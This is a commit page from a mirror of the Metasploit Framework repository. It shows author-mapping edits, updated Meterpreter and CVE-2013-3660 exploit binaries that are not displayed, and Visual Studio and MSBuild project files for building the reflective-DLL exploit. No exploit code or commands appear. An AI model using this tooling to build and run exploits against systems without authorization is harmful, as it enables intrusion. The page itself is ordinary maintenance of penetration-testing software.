infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into submodule 

Conflicts:
	external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj
bug/bundler_fix
Meatballs 2013-12-08 18:25:03 +00:00
parent 6edd9aa736 0c5d748fca
commit ab1ddac0c8
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
116 changed files with 2458 additions and 1514 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
.mailmap
View File

@ -20,7 +20,7 @@ wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@ -40,8 +40,8 @@ Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <>

BIN
data/exploits/cve-2013-3660/exploit.dll
View File

Binary file not shown.

BIN
data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll
View File

Binary file not shown.

20
external/source/exploits/cve-2013-3660/dll/reflective_dll.sln vendored
View File

@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

357
external/source/exploits/cve-2013-3660/dll/reflective_dll.vcproj vendored
View File

@ -1,357 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="reflective_dll"
ProjectGUID="{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
RootNamespace="reflective_dll"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="1"
GenerateDebugInformation="true"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy ..\Release\reflective_dll.dll ..\bin\"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="2"
WholeProgramOptimization="0"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
InlineFunctionExpansion="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
WholeProgramOptimization="false"
PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="2"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
OutputFile="$(OutDir)\$(ProjectName).x64.dll"
LinkIncremental="1"
GenerateDebugInformation="true"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy $(OutDir)\$(ProjectName).x64.dll ..\bin\"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\src\ReflectiveDll.c"
>
</File>
<File
RelativePath=".\src\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\src\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\src\ReflectiveLoader.h"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>

270
external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj vendored
View File

@ -1,270 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|ARM">
<Configuration>Debug</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|ARM">
<Configuration>Release</Configuration>
<Platform>ARM</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
<RootNamespace>reflective_dll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v100</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v110</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>11.0.50727.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(SolutionDir)$(Configuration)\</OutDir>
<IntDir>$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<TargetName>exploit</TargetName>
<SourcePath>$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\;</SourcePath>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<IntDir>$(Platform)\$(Configuration)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<IncludePath>$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(WindowsSDK_IncludePath);..\..\..\ReflectiveDLLInjection\common\;..\..\..\ReflectiveDLLInjection\dll\src\;</IncludePath>
<SourcePath>$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\mfcm;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src;..\..\..\ReflectiveDLLInjection\dll\src\;</SourcePath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>
</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN_ARM;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>true</BufferSecurityCheck>
<CompileAs>Default</CompileAs>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OutputFile>$(OutDir)$(ProjectName).arm.dll</OutputFile>
</Link>
<PostBuildEvent>
<Command>copy ..\ARM\Release\reflective_dll.arm.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>true</IntrinsicFunctions>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PreprocessorDefinitions>WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;WIN_X64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsCpp</CompileAs>
</ClCompile>
<Link>
<OutputFile>$(OutDir)$(ProjectName).x64.dll</OutputFile>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>copy $(OutDir)$(ProjectName).x64.dll ..\bin\</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
<ClCompile Include="src\ReflectiveDll.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
<ClInclude Include="..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
<ClInclude Include="src\ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

32
external/source/exploits/cve-2013-3660/dll/reflective_dll.vcxproj.filters vendored
View File

@ -1,32 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="src\ReflectiveDll.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="src\ReflectiveLoader.c">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="src\ReflectiveDLLInjection.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ReflectiveLoader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="src\ComplexPath.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>

18
external/source/exploits/cve-2013-3660/make.msbuild vendored Executable file
View File

@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\ppr_flatten_rec.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-3660 ppr_flatten_rc x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="ppr_flatten_rec is not supported in x64" />
</Target>
</Project>

22
external/source/exploits/cve-2013-3660/ppr_flatten_rec.sln vendored Executable file
View File

@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ppr_flatten_rec", "ppr_flatten_rec\ppr_flatten_rec.vcxproj", "{942BF20A-E438-48B0-A614-A6E0CC2E94BD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.ActiveCfg = Debug|Win32
